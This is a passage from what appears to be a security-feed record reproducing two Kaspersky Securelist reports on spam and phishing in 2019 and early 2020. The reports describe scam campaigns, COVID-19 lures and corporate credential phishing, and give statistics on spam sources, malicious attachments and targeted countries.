to confirm the user's location (and hence right to view the content). However, instead of continuing the broadcast, the scammers simply pocketed the details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150402/sl_spamreport_2019_01.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150400/sl_spamreport_2019_02.png>)\n\nNew gadgets were also deployed as a bait. Cybercriminals created fake pages mimicking official Apple services. The number of fake sites rose sharply after the company unveiled its new products. And while Apple was only just preparing to release the next gadget, fraudsters were offering to \"sell\" it to those with itchy hands. All that victim had to do was follow a link and enter their AppleID credentials \u2014 the attackers' objective.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150358/sl_spamreport_2019_03.png>)\n\n### The price of fame: attackers exploit popular resources\n\nIn 2019, scammers found new ways to exploit popular resources and social networks to spread spam and sell non-existent goods and services. They actively used Youtube and Instagram comments to place ads and links to potentially malicious pages, and created numerous social media accounts that they promoted by commenting on the posts of popular bloggers.\n\nFor added credibility, they left many fake comments on posts about hot topics. As the account gained a following, it began to post messages about promotions. For example, a sale of branded goods at knock-down prices. Victims either received a cheap imitation or simply lost their cash.\n\nA similar scheme was used to promote get-rich-quick-online videos, coupled with gushing reviews from \"newly flush\" clients.\n\nAnother scam involved fake celebrity Instagram accounts. The \"stars\" asked fans to take a survey and get a cash payout or the chance to participate in a prize draw. Naturally, a small upfront fee was payable for this unmissable opportunity\u2026 After the cybercriminals received the money, the account simply disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150356/sl_spamreport_2019_04.png>)\n\nBesides distributing links through comments on social networks, scammers utilized yet another delivery method in the shape of Google services: invitations to meetings sent via Google Calendar or notifications from Google Photos that someone just shared a picture were accompanied by a comment from the attackers with links to fake promotions, surveys, and prize giveaways.\n\nOther Google services were also used: links to files in Google Drive and Google Storage were sent inside fraudulent e-mails, which spam filters are not always able to spot. Clicking it usually opened a file with adware (for example, fake pharmaceutical products) or another link leading to a phishing site or a form for collecting personal data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150356/sl_spamreport_2019_05.png>)\n\nAlthough Google and others are constantly working to protect users from scammers, the latter are forever finding new loopholes. Therefore, the main protection against such schemes is to pay careful attention to messages from unfamiliar senders.\n\n### Malicious transactions\n\nIn Q1, users of the Automated Clearing House (ACH), an electronic funds-transfer system that facilitates payments in the US, fell victim to fraudsters: we registered mailings of fake ACH notifications about the status of a payment or debt. By clicking the link or opening the attachment, the user risked infecting the computer with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150355/sl_spamreport_2019_06.png>)\n\n### Anyone order bitcoin?\n\nCryptocurrency continues to be of interest to scammers. Alongside the standard fakes of well-known cryptocurrency exchanges, cybercriminals have started creating their own: such resources promise lucrative exchange rates, but steal either personal data or money.\n\n### [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150356/sl_spamreport_2019_07.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150354/sl_spamreport_2019_08.png>)\n\n### Cryptocurrencies and blackmail\n\nIf in 2018 cybercriminals tried to blackmail users by claiming to have malware-obtained compromising material on them, in 2019 e-mails began arriving from a CIA agent (the name varied) supposedly dealing with a case opened against the message recipient pertaining to the storage and distribution of pornographic images of minors.\n\nThe case, the e-mail alleged, was part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"agent\" happened to know that the recipient was a well-heeled individual with a reputation to protect, and for $10,000 in bitcoin would be willing to alter or destroy the dossier (all information about the victim to add credence to the e-mail was harvested in advance from social networks and forums). For someone genuinely afraid of the potential consequences, this would be a small price to pay.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150352/sl_spamreport_2019_09.png>)\n\nLegal entities found themselves in an even more desperate situation when faced with similar threats. However for them it was not about sextortion, but spamming. The blackmailers sent a message to the company using its public e-mail address or online feedback form in which they demanded a ransom in bitcoin. If refused, the attackers threatened to send millions of spam e-mails in the company's name. This, the cybercriminals assured, would prompt the Spamhaus Project to recognize the resource as a spammer and block it forever.\n\n### [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150350/sl_spamreport_2019_10.png>)\n\n### Corporate sector in the crosshairs\n\nThe growing trend for attacks on the corporate sector is reflected not only in the attempts to cyber-blackmail companies. The reputation of many firms has been compromised by spam mailings through feedback forms. Having previously used such forms to attack the mailboxes of company employees, in 2019 cybercriminals evolved their methods.\n\nAs such, messages about successful registation on a particular website were received by people who had never even heard about it. After finding a security hole in the site, spammers used a script to bypass the CAPTCHA system and mass-register users via the feedback form. In the Username field, the attackers inserted message text or link. As a result, the victim whose mailing address was used received a registration confirmation e-mail from a legitimate sender, but containing a message from the scammers. Moreover, the company itself had no idea that this was going on.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150350/sl_spamreport_2019_11.png>)\n\nA far more serious threat came from mailings masked as automatic notifications from services used to compile legitimate mailing lists: the scammers' messages were carefully disguised as notifications about new voice messages (some business products have a feature for exchanging voice messages) or about incoming e-mails stuck in the delivery queue. To access them, the employee had to go through an authentication process, whereupon the corporate account credentials ended up in the hands of the attackers.\n\nScammers devised new methods to coax confidential data out of unsuspecting company employees. For example, by sending e-mails requesting urgent confirmation of corporate account details or payment information with a link conveniently supplied. If the user swallowed the bait, the authentication data for their account went straight to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150349/sl_spamreport_2019_12.png>)\n\nAnother attack aimed at the corporate sector employed a more complex scheme: the attackers tried to dupe e-mail recipients into thinking that the company management was offering a pay rise in exchange for taking a performance review.\n\nThe message appeared to come from HR and contained detailed instructions and a link to a bogus appraisal form. But before going through the procedure, the recipient had to enter a few details (in most cases it was specified that the e-mail address had to be a corporate one). After clicking the Sign in or Appraisal button, the entered credentials were duly forwarded to the attackers, granting them access to business correspondence, personal data, and probably confidential information too, which could later be used for blackmail or sold to competitors.\n\nA simpler scheme involved sending phishing e-mails supposedly from services used by the company. The most common were fake notifications from HR recruiting platforms.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150348/sl_spamreport_2019_13.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\nThe share of spam in mail traffic in 2019 increased by 4.03 p.p. to 56.51%.\n\n_Proportion of spam in global mail traffic, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150545/sl_spamreport_2019_charts_01-en-spam-report-2019-diagramme-und-bilder.png>)_\n\nThe lowest figure was recorded in September (54.68%), and the highest in May (58.71%).\n\n### Sources of spam by country\n\nIn 2019, as in the year before, China retained its crown as the top spam-originating country. Its share grew significantly from the previous year (up 9.57 p.p.) to 21.26%. It remains ahead of the US (14.39%), whose share increased by 5.35 p.p. In third place was Russia (5.21%).\n\nFourth position went to Brazil (5.02%), despite shedding 1.07 p.p. Fifth place in 2019 was claimed by France (3.00%), and sixth by India (2.84%), which ranked the same as the year before. Vietnam (2.62%), fourth in the previous reporting period, moved down to seventh.\n\nThe TOP 10 is rounded out by Germany, dropping from third to eighth (2.61%, down by 4.56 p.p.), Turkey (2.15%), and Singapore (1.72%).\n\n_Sources of spam by country, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150348/sl_spamreport_2019_charts_02_ransomware-geo.png>)_\n\n### Spam e-mail size\n\nIn 2019, the share of very small e-mails continued to grow, but less dramatically than the year before \u2014 by just 4.29 p.p. to 78.44%. Meanwhile, the share of e-mails sized 2\u20135 KB decreased against 2018 by 4.22 p.p. to 6.42%.\n\n_Spam e-mails by size, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150341/sl_spamreport_2019_charts_03-spam-report-2019-diagramme-und-bilder.png>)_\n\nThe share of larger e-mails (10\u201320 KB) changed insignificantly, down by 0.84 p.p. But there was more junk mail sized 20\u201350 KB: such messages accounted for 4.50% (+1.68 p.p) In addition, the number of 50\u2013100 KB sized e-mails rose by almost 1 p.p, amounting to 1.81%.\n\n### Malicious mail attachments\n\n#### Malware families\n\n_ Number of Mail Anti-Virus triggerings, 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/06134200/07-en-indiana-jones-and-the-lost-chart.png>)) _\n\nIn 2019, our security solutions detected a total of 186 005 096 malicious email attachments. November was the most active month with 19 million Mail Anti-Virus triggerings, while December was the \"calmest\" \u2014 with 7 million fewer.\n\n_TOP 10 malware families, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150341/sl_spamreport_2019_charts_04-spam-report-2019-diagramme-und-bilder.png>)_\n\nIn 2019, like the year before it, **Exploit.Win32.CVE-2017-11882** malicious objects were the most commonly encountered malware (7.24%). They exploited a vulnerability in Microsoft Office that allowed arbitrary code to be executed without the user's knowledge.\n\nIn second place is the **Trojan.MSOffice.SAgent** family (3.59%), whose members also attack Microsoft Office users. This type of malware consists of a document with a built-in VBA script that secretly loads other malware using PowerShell when the document is opened.\n\nThe **Worm.Win32.WBVB** family (3.11%), which includes executable files written in Visual Basic 6 and classed as untrusted by KSN, rose from fourth place in the rating to third.\n\n**Backdoor.Win32.Androm.gen** (1.64%), which ranked second in the previous reporting period, dropped to fourth position. This modular backdoor is most often used to download malware onto the victim's machine.\n\nFifth place in 2019 was taken by the **Trojan.Win32.Kryptik** family (1.53%). This verdict is assigned to Trojans that use anti-emulation, anti-debugging, and code obfuscation to make them difficult to analyze.\n\n**Trojan.MSIL.Crypt.gen** (1.26%) took sixth place, while **Trojan.PDF.Badur** (1.14%) \u2014 a PDF that directs the user to a potentially dangerous site \u2014 climbed to seventh.\n\nEighth position fell to another malicious DOC/DOCX document with a malicious VBA script inside \u2014 **Trojan-Downloader.MSOffice.SLoad.gen** (1.14%), which, when opened, may download ransomware onto the victim's computer.\n\nIn ninth place is **Backdoor.Win32.Androm**, and propping up the table is **Trojan.Win32.Agent** (0.92%).\n\n \n\n### Countries targeted by malicious mailings\n\nAs in the previous year, Germany took first place in 2019. Its share remained virtually unchanged: 11.86% of all attacks (+0.35 p.p.). Second place was claimed jointly by Russia and Vietnam (5.77% each) \u2014 Russia held this position in the previous reporting period, while Vietnam's rise to the TOP 3 came from sixth position.\n\n_Countries targeted by malicious mailings, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150341/sl_spamreport_2019_charts_05_en-ransomware-geo.png>)_\n\nLagging behind by just 0.2 p.p. is Italy (5.57%), while the UAE is in fifth place (4.74%), Brazil in sixth (3.88%), and Spain in seventh (3.45%). The TOP 10 is rounded out by the practically neck-and-neck India (2.67%), Mexico (2.63%), and Malaysia (2.39%).\n\n## Statistics: phishing\n\nIn 2019, the Anti-Phishing system was triggered **467 188 119** times on Kaspersky user computers as a result of phishing redirection attempts (15,277,092 fewer than in 2018). In total, 15.17% of our users were attacked.\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an e-mail or on the Internet to a phishing page in cases when such link has yet to be added to Kaspersky's databases._\n\n#### Rating of categories of organizations attacked by phishers\n\nIn contrast to 2018, in this reporting period the largest share of heuristic component triggers fell to the Banks category. Its slice increased by 5.46 p.p. to 27.16%. Last year's leader, the Global Internet Portals category, moved down a rung to second. Against last year, its share decreased by 3.60 p.p. (21.12%). The Payment Systems category remained in third place, its share in 2019 amounting to 16.67% (-2.65 p.p.).\n\n_Distribution of organizations subject to phishing attacks by category, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150331/sl_spamreport_2019_charts_06-en-spam-report-2019-diagramme-und-bilder.png>)_\n\n### Attack geography\n\n#### Countries by share of attacked users\n\nThis period's leader by percentage of attacked unique users out of the total number of users was Venezuela (31.16%).\n\n_Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150332/sl_spamreport_2019_charts_07-en-ransomware-geo.png>)_\n\n \n\n#### TOP 10 countries by share of attacked users\n\n**Country** | **%** \n---|--- \nVenezuela | 31.16 \nBrazil | 30.26 \nGreece | 25.96 \nPortugal | 25.63 \nAustralia | 25.24 \nAlgeria | 23.93 \nChile | 23.84 \nR\u00e9union | 23.82 \nEcuador | 23.53 \nFrench Guiana | 22.94 \n \n_TOP 10 countries by share of attacked users_\n\nLast year's leader, Brazil (30.26%), this year found itself in second place, shedding 1.98 p.p. and ceding top spot to Venezuela (31.16%), which moved up from ninth position, gaining 11.27 p.p. In third place was TOP 10 newcomer Greece (25.96%).\n\n## Wrap-up\n\nTV premieres, high-profile sporting events, and the release of new gadgets were exploited by scammers to steal users' personal data or money.\n\nIn the search for new ways to bypass spam filters, attackers are developing new methods of delivering their messages. This year, they made active use of various Google services, as well as popular social networks (Instagram) and video hosting sites (YouTube).\n\nCybercriminals continue to use the topic of finance in schemes aimed at gaining access to users' personal data, infecting computers with malware, or stealing funds from victims' accounts.\n\nThe main trend of 2019 was the rise in the number of attacks on the corporate sector. Fraudulent schemes previously used to repeatedly attack ordinary users changed direction, adding new intricacies to cybercriminal tactics.", "modified": "2020-04-08T10:00:10", "published": "2020-04-08T10:00:10", "id": "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "href": "https://securelist.com/spam-report-2019/96527/", "type": "securelist", "title": "Spam and phishing in 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-26T11:50:09", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "\n\n## Quarterly highlights\n\n### Don't get burned\n\nBurning Man is one of the most eagerly awaited events among fans of spectacular performance and installation art. The main obstacle to attending is the price of admission: a standard ticket will set you back $475, the number is limited, and the buying process is a challenge all by itself (there are several stages, registration data must be entered at a specific time, and if something goes wrong you might not get a second chance). Therefore, half-price fake tickets make for excellent bait.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202244/sl_spam_report_11.png>)\n\nScammers tried to make their website as close as possible to the original \u2014 even the page with the ticket description looked genuine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202316/sl_spam_report_12.png>)\n\nThere were just three major differences from the original: only the main page and the ticket purchase section were actually operational, tickets were \"sold\" without prior registration, and the price was a steal ($225 versus $475).\n\n### Oscar-winning scammers\n\nFebruary 2020 saw the 92nd Academy Awards ceremony. Even before the big night, websites were popping up offering free viewings of all the nominated films. Fraudsters targeted users eager to see the short-listed movies before the presentation of the awards.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202400/sl_spam_report_13.png>)\n\nTo promote these sites, Twitter accounts were created \u2014 one for each nominated film.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202431/sl_spam_report_14.png>)\n\nCurious users were invited to visit the resource, where they were shown the first few minutes before being asked to register to continue watching.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202503/sl_spam_report_15.png>)\n\nDuring registration, the victim was prompted to enter their bank card details, allegedly to confirm their region of residence. Unsurprisingly, a short while later a certain amount of money disappeared from their account, and the movie did not resume.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202534/sl_spam_report_16.png>)\n\nUsers should be alert to the use of short links in posts on social networks. Scammers often use them because it's impossible to see where a shortened URL points without actually following it.\n\nThere are special services that let you check what lies behind such links, often with an additional bonus in the form of a verdict on the safety of the website content. It is important to do a proper check on links from untrusted sources.\n\n### ID for hire\n\nUS companies that leak customer data can be heavily fined by the Federal Trade Commission (FTC). For example, in 2019 Facebook was slapped with a $5 billion penalty; however, users whose data got stolen do not receive any compensation. This is what scammers decided to exploit by sending a fake e-mail offering compensation from the non-existent Personal Data Protection Fund, created by the equally fictitious US Trading Commission.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202917/sl_spam_report_40.png.jpg>)\n\nInspired by the idea of services for checking accounts for leaks, the cybercriminals decided to create their own. Visitors were invited to check whether their account details had been stolen, and if so (the answer was \"yes\" even if the input was gibberish), they were promised compensation \"for the leakage of personal data.\"\n\nTo receive \"compensation,\" the victim's citizenship was of no consequence \u2014 what mattered was their first name, last name, phone number, and social network accounts. For extra authenticity, a warning message about the serious consequences of using other people's data to claim compensation popped up obsessively on the page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203248/sl_spam_report_41.jpg>)\n\nTo receive the payment, US citizens were asked to enter their Social Security Number (SSN). Everyone else had to check the box next to the words \"I'am don't have SSN\" (the mistakes are a good indicator of a fake), whereupon they were invited to \"rent\" an SSN for $9. Interestingly, even if the user already had an SSN, they were still pestered to get another one.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203357/sl_spam_report_42.jpg>)\n\nAfter that, the potential victim was redirected to a payment page with the amount and currency based on the user's location. For instance, users in Russia were asked to pay in rubles.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203504/sl_spam_report_43.jpg>)\n\nThe scam deployed the conventional scheme (especially common in the Runet) of asking the victim to pay a small commission or down payment for the promise of something much bigger. In Q1, 14,725,643 attempts to redirect users to such websites were blocked.\n\n## Disaster and pandemic\n\n### Fires in Australia\n\nThe natural disaster that hit the Australian continent was another get-rich opportunity for scammers. For example, one \"Nigerian prince\"-style e-mail scam reported that a millionaire dying of cancer was ready to donate her money to save the Australian forests. The victim was asked to help withdraw the funds from the dying woman's account by paying a fee or making a small contribution to pay for the services of a lawyer, for which they would be rewarded handsomely at a later date.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203546/sl_spam_report_21.png>)\n\nBesides the fictional millionaire, other \"nature lovers\" were keen to help out \u2014 their e-mails were more concise, but the scheme was essentially the same.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203616/sl_spam_report_22.png>)\n\n### COVID-19\n\n#### \"Nigerian prince\" scheme\n\nCOVID-19 was (and continues to be) a boon to scammers: non-existent philanthropists and dying millionaires are popping up everywhere offering rewards for help to withdraw funds supposedly for humanitarian purpsoses. Some recipients were even invited to help finance the production of a miracle vaccine, or take part in a charity lottery, the proceeds of which, it was said, would be distributed to poor people affected by the pandemic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203723/sl_spam_report_23.png>)\n\n#### Bitcoin for coronavirus\n\nHaving introduced themselves as members of a healthcare organization, the scammers appealed to the victim to transfer a certain sum to the Bitcoin wallet specified in the message. The donation would allegedly go toward fighting the coronavirus outbreak and developing a vaccine, as well as helping victims of the pandemic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203816/sl_spam_report_24.png>)\n\nIn one e-mail, the attackers played on people's fear of contracting COVID-19: the message was from an unnamed \"neighbor\" claiming to be dying from the virus and threatening to infect the recipient unless the latter paid a ransom (which, it was said, would help provide a comfortable old age for the ransomer's parents).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203854/sl_spam_report_25.png>)\n\n#### Dangerous advice from the WHO\n\nOne fraudulent mailing disguised as a WHO newsletter offered tips about staying safe from COVID-19.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203939/sl_spam_report_26.png>)\n\nTo get the information, the recipient had to click a link pointing to a fake WHO website. The design was so close to the original that only the URL gave away the scam. The cybercriminals were after login credentials for accounts on the official WHO site. Whereas in the first mailings only a username and password were asked for, in later ones a phone number was also requested.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204032/sl_spam_report_27.png>)\n\nIn addition, we detected several e-mails supposedly from the WHO containing documents with malware. The recipient was asked to open the attachment (in DOC or PDF format), which allegedly offered coronavirus prevention advice. For example, this message contained [Backdoor.Win32.Androm.tvmf](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Androm/>):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204128/sl_spam_report_28.png>)\n\nThere were other, less elaborate mailings with harmful attachments, including ones containing Trojan-Spy.Win32.Noon.gen:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204203/sl_spam_report_29.png>)\n\n \n\n#### Corporate segment\n\nThe coronavirus topic was also exploited in attacks on the corporate sector. For example, COVID-19 was cited in fraudulent e-mails as a reason for delayed shipments or the need to reorder. The authors marked the e-mails as urgent and required to check attached files immediately.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204258/sl_spam_report_30.png>)\n\nAnother mailing prompted recipients to check whether their company was in a list of firms whose activities were suspended due to the pandemic. After which it asked for a form to be filled out, otherwise the company could be shut down. Both the list of companies and the form were allegedly in the archives attached to the message. In actual fact, the attachments contained [Trojan-PSW.MSIL.Agensla.a](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204343/sl_spam_report_31.png>)\n\nWe also registered a phishing attack on corporate users. On a fake page, visitors were invited to monitor the coronavirus situation across the world using a special resource, for which the username and password of the victim's corporate mail account were required.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204434/sl_spam_report_32.png>)\n\n#### Government compensation\n\nThe introduction of measures to counter the pandemic put many people in a difficult financial situation. Forced downtime in many industries has had a negative impact on financial well-being. In this climate, websites offering compensation from the government pose a particular danger.\n\nOne such popular scheme was [highlighted](<https://twitter.com/assolini/status/1242054069193183235>) by a colleague of ours from Brazil. A WhatsApp messages about financial or food assistance were sent that appeared to come from a supermarket, bank, or government department. To receive the aid, the victim had to fill out the attached form and share the message with a certain number of contacts. After the form was filled out, the data was sent to the cybercriminals, while the victim got redirected to a page with advertising, a phishing site, a site offering a paid SMS subscription, or similar.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204543/sl_spam_report_34.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204614/sl_spam_report_35.png>)\n\nGiven that the number of fake sites offering government handouts seems likely only to increase, we urge caution when it comes to promises of compensation or material assistance.\n\n#### Anti-coronavirus protection with home delivery\n\nDue to the pandemic, demand for antiseptics and antiviral agents has spiked. We registered a large number of mailings with offers to buy antibacterial masks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204656/sl_spam_report_36.png>)\n\nIn Latin America, WhatsApp mass messages were used to invite people to take part in a prize draw for hand sanitizer products from the brewing company Ambev. The company has indeed started making antiseptics and hand gel, but exclusively for public hospitals, so the giveaway was evidently the work of fraudsters.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204722/sl_spam_report_37.png>)\n\nThe number of fake sites offering folk remedies for the treatment of coronavirus, drugs to strengthen the immune system, and non-contact thermometers and test kits has also risen sharply. Most of the products on offer have no kind of certification whatsoever.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204747/sl_spam_report_38.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204823/sl_spam_report_39.png>)\n\nOn average, the daily share of e-mails mentioning COVID-19 in Q1 amounted to around 6% of all junk traffic. More than 50% of coronavirus-related spam was in the English language. We anticipate that the number of phishing sites and pandemic-related scams will only increase, and that cybercriminals will use new attack schemes and strategies.\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212717/sl_spam_report_01-en-dolya-spama-v-mirovom-pochtovom-trafike-q4-2019-q1-2020-g.png>)_\n\nIn Q1 2020, the largest share of spam was recorded in January (55.76%). The average percentage of spam in global mail traffic was 54.61%, down 1.58 p.p. against the previous reporting period.\n\n_Proportion of spam in Runet mail traffic, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212802/sl_spam_report_02-en-dolya-spama-v-pochtovom-trafike-runeta-q4-2019-q1-2020-g.png>)_\n\nIn Q1, the share of spam in Runet traffic (the Russian segment of the Internet) likewise peaked in January (52.08%). At the same time, the average indicator, as in Q4 2019, remains slightly lower than the global average (by 3.20 p.p.).\n\n## Sources of spam by country\n\n \n\n_Sources of spam by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212844/sl_spam_report_03-en-strany-istochniki-spama-v-mire-pervyj-kvartal-2020-g.png>)_\n\nIn Q1 2020, Russia led the TOP 5 countries by amount of outgoing spam. It accounted for 20.74% of all junk traffic. In second place came the US (9.64%), followed by Germany (9.41%) just 0.23 p.p. behind. Fourth place goes to France (6.29%) and fifth to China (5.22%), which is usually a TOP 3 spam source.\n\nBrazil (3.56%) and the Netherlands (3.38%) took sixth and seventh positions, respectively, followed by Vietnam (2.55%), with Spain (2.34%) and Poland (2.21%) close on its heels in ninth and tenth.\n\n### Spam e-mail size\n\n \n\n_Spam e-mail size, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212928/sl_spam_report_04-en-razmery-spamovyh-pisem-vtoroj-i-tretij-kvartaly-2019-g.png>)_\n\nCompared to Q4 2019, the share of very small e-mails (up to 2 KB) in Q1 2020 fell by more than 6 p.p. and amounted to 59.90%. The proportion of e-mails sized 5-10 KB grew slightly (by 0.72 p.p.) against the previous quarter to 5.56%.\n\nMeanwhile, the share of 10-20 KB e-mails climbed by 3.32 p.p. to 6.36%. The number of large e-mails (100\u2013200 KB) also posted growth (+2.70 p.p.). Their slice in Q1 2020 was 4.50%.\n\n### Malicious attachments in e-mail\n\n \n\n_Number of Mail Anti-Virus triggerings, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213009/sl_spam_report_05-en-kolichestvo-srabatyvanij-pochtovogo-antivirusa-q4-2019-q1-2020-g.png>)_\n\nIn Q1 2020, our security solutions detected a total of 49,562,670 malicious e-mail attachments, which is almost identical to the figure for the last reporting period (there were just 314,862 more malicious attachments detected in Q4 2019).\n\n_TOP 10 malicious attachments in mail traffic, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213057/sl_spam_report_06-en-top-10-vredonosnyh-vlozhenij-v-pochtovom-trafike-pervyj-kvartal-2020-g.png>)_\n\nIn Q1, first place in terms of prevalence in mail traffic went to Trojan.Win32.Agentb.gen (12.35%), followed by Exploit.MSOffice.CVE-2017-11882.gen (7.94%) in second and Worm.Win32.WBVB.vam (4.19%) in third.\n\n_TOP 10 malicious families in mail traffic, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213137/sl_spam_report_07-en-top-10-vredonosnyh-semejstv-v-pochtovom-trafike-pervyj-kvartal-2020.png>)_\n\nAs regards malware families, the most widespread this quarter was [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) (12.51%), with [Exploit.MSOffice.CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (7.98%), whose members exploit a vulnerability in Microsoft Equation Editor, in second place and [Worm.Win32.wbvb](<https://threats.kaspersky.com/en/threat/Worm.Win32.WBVB/>) (4.65%) in third.\n\n### Countries targeted by malicious mailshots\n\n \n\n_Distribution of Mail Anti-Virus triggerings by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213218/sl_spam_report_08-en-raspredelenie-srabatyvanij-pochtovogo-antivirusa-po-stranam-pervyj-kvartal-2020-g.png>)_\n\nFirst place by number of Mail Anti-Virus triggerings in Q1 2020 was claimed by Spain. This country accounted for 9.66% of all users of Kaspersky security solutions who encountered e-mail malware worldwide. Second place went to Germany (8.53%), and Russia (6.26%) took bronze.\n\n## Statistics: phishing\n\nIn Q1 2020, the Anti-Phishing system prevented **119,115,577** attempts to redirect users to scam websites. The percentage of unique attacked users was 8.80% of the total number of users of Kaspersky products in the world.\n\n### Attack geography\n\nThe country with the largest proportion of users attacked by phishers, not for the first time, was Venezuela (20.53%).\n\n_Geography of phishing attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213300/sl_spam_report_09-en-geografiya-fishingovyh-atak-pervyj-kvartal-2020-goda.png>)_\n\nIn second place, by a margin of 5.58 p.p., was Brazil (14.95%), another country that is no stranger to the TOP 3. Next came Australia (13.71%), trailing by just 1.24 p.p.\n\n**Country** | **%*** \n---|--- \nVenezuela | 20.53% \nBrazil | 14.95% \nAustralia | 13.71% \nPortugal | 12.98% \nAlgeria | 12.12% \nFrance | 11.71% \nHonduras | 11.62% \nGreece | 11.58% \nMyanmar | 11.54% \nTunisia | 11.53% \n \n_* Share of users on __whose computers Anti-Phishing was triggered out of all Kaspersky users in the country_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky products Anti-Phishing component. This component detects pages with phishing content that the user gets redirected to. It does not matter whether the redirect is the result of clicking a link in a phishing e-mail or in a message on a 